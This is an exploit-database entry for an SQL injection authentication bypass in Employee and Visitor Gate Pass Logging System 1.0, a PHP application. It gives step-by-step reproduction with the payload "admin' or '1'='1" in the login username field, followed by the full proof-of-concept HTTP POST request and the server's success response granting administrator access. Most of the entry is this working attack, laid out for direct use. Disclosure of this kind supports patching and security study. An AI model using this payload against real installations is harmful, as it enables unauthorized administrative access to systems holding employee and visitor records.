Lucene search

K
zdtFurkan Eren Tetik1337DAY-ID-39640
HistoryJun 04, 2024 - 12:00 a.m.

Employee And Visitor Gate Pass Logging System 1.0 SQL Injection Vulnerability

2024-06-0400:00:00
Furkan Eren Tetik
0day.today
105
vulnerability
employee gate pass
visitor
sql injection
authentication bypass
source code
login page
payload
administrator
reproduction steps
php
win64
kali linux
xmlhttprequest

AI Score

8.7

Confidence

Low

Employee and Visitor Gate Pass Logging System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

# Exploit Title: Employee and Visitor Gate Pass Logging System - SQLi Authentication Bypass
# Exploit Author: Furkan Eren Tetik
# Vendor Homepage: https://www.sourcecodester.com/php/15026/employee-and-visitor-gate-pass-logging-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=15026&title=Employee+and+Visitor+Gate+Pass+Logging+System+in+PHP+with+Source+Code
# Version: 1.0
# Tested on: Windows 11, Kali Linux
# Employee and Visitor Gate Pass Logging System v1.0 Login page can be bypassed with a simple SQLi to the username parameter.

Steps To Reproduce:
1 - Go to the login page http://localhost/employee_gatepass/admin/login.php
2 - Enter the payload to username field as "admin' or '1'='1" without double-quotes and type anything to password field.
3 - Click on "Login" button and you are logged in as administrator.

PoC

Request

POST /employee_gatepass/classes/Login.php?f=login HTTP/1.1
Host: localhost
Content-Length: 43
sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/employee_gatepass/admin/login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=9f8v4097jovtf6a3igi4l6479i
Connection: close

username=admin'+or+'1'%3D'1&password=furkan

--------------------------------------------------------------------------------------------------------------------------------

response

HTTP/1.1 200 OK
Date: Wed, 29 May 2024 17:01:26 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
X-Powered-By: PHP/8.0.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

{"status":"success"}

AI Score

8.7

Confidence

Low